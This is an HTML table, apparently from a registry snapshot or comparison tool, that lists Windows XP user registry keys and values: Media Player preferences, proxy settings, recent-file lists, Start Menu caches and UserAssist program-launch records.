<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPMetadataView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"MediaInfoView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserDisplayPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPDisplayPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPSettingsPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPMetadataPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPShowSettings</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPShowMetadata</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowAlbumArt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">RandomFolderName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"0009236B"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LastPlaylist</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,41,00,70,00,70,00,6c,00,69,00,63,00,61,00,74,00,69,00,6f,00,6e,00,20,00,44,00,61,00,74,00,61,00,5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,4d,00,65,00,64,00,69,00,61,00,20,00,50,00,6c,00,61,00,79,00,65,00,72,00,5c,00,30,00,30,00,30,00,39,00,32,00,33,00,36,00,42,00,2e,00,77,00,70,00,6c,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LastPlaylistQuery</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LastPlaylistIndex</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\EqualizerSettings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyStyle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyPort</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000050</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyBypass</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyExclude</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyStyle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyPort</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000006db</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyBypass</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyExclude</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyStyle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyPort</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000022a</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyBypass</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyExclude</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions</span></td>
<td><span style="color: black; font-size: xx-small;">DesktopShortcut</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"no"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions</span></td>
<td><span style="color: black; font-size: xx-small;">QuickLaunchShortcut</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\CreatedLinks</span></td>
<td><span style="color: black; font-size: xx-small;">Shortcut4</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache</span></td>
<td><span style="color: black; font-size: xx-small;">0</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:e0,5a,00,00,65,68,63,66,00,00,00,00,00,00,00,00,02,01,00,00,00,00,00,00,01,00,20,00,49,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,32,00,45,00,45,00,42,00,34,00,41,00,44,00,46,00,2d,00,34,00,35,00,37,00,38,00,2d,00,34,00,44,00,31,00,30,00,2d,00,42,00,43,00,41,00,37,00,2d,00,42,00,42,00,39,00,35,00,35,00,46,00,35,00,36,00,33,00,32,00,30,00,41,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,42,00,2d,00,34,00,35,00,31,00,33,00,2d,00,39,00,44,00,34,00,33,00,2d,00,44,00,43,00,44,00,32,00,41,00,36,00,35,00,39,00,33,00,31,00,32,00,35,00,7d,00,00,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,38,00,37,00,34,00,31,00,33,00,31,00,43,00,42,00,2d,00,34,00,45,00,43,00,43,00,2d,00,34,00,34,00,33,00,42,00,2d,00,38,00,39,00,34,00,38,00,2d,00,37,00,34,00,36,00,42,00,38,00,39,00,35,00,39,00,35,00,44,00,32,00,30,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU</span></td>
<td><span style="color: black; font-size: xx-small;">a</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:77,00,69,00,72,00,65,00,73,00,68,00,61,00,72,00,6b,00,2e,00,65,00,78,00,65,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,4d,00,79,00,20,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU</span></td>
<td><span style="color: black; font-size: xx-small;">MRUList</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"a"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU</span></td>
<td><span style="color: black; font-size: xx-small;">a</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\My Documents\pcap"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU</span></td>
<td><span style="color: black; font-size: xx-small;">MRUList</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"a"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*</span></td>
<td><span style="color: black; font-size: xx-small;">a</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\My Documents\pcap"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*</span></td>
<td><span style="color: black; font-size: xx-small;">MRUList</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"a"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs</span></td>
<td><span style="color: black; font-size: xx-small;">Order</span></td>
<td><span style="color: black; font-size: xx-small;">hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage</span></td>
<td><span style="color: black; font-size: xx-small;">ProgramsCache</span></td>
<td><span style="color: black; font-size: xx-small;">hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage</span></td>
<td><span style="color: black; font-size: xx-small;">StartMenu_Balloon_Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:b0,27,b0,17,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:f0,f5,4b,1c,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,10,00,00,00,50,e8,07,19,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,14,00,00,00,90,71,d8,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\pzq.rkr</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,d0,cf,da,d9,de,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,90,2d,68,fb,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\Cebtenz Svyrf\Vagrearg Rkcybere\VRKCYBER.RKR</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,b0,e4,6a,a6,dd,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,d0,f4,ef,4e,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,0d,00,00,00,b0,f7,ed,18,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,11,00,00,00,00,91,ad,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5\VafgnyyEvgr.yax</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,60,0a,ac,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,00,91,ad,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\Cebtenz Svyrf\Rcfvyba Fdhnerq\VafgnyyEvgr\VafgnyyEvgr.rkr</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,50,e8,07,19,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,90,71,d8,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:::{2559N1S4-21Q7-11Q4-OQNS-00P04S60O9S0}</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,07,00,00,00,b0,e4,6a,a6,dd,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,70,7b,f1,4e,df,98,cd,01,</span></td>
</tr>
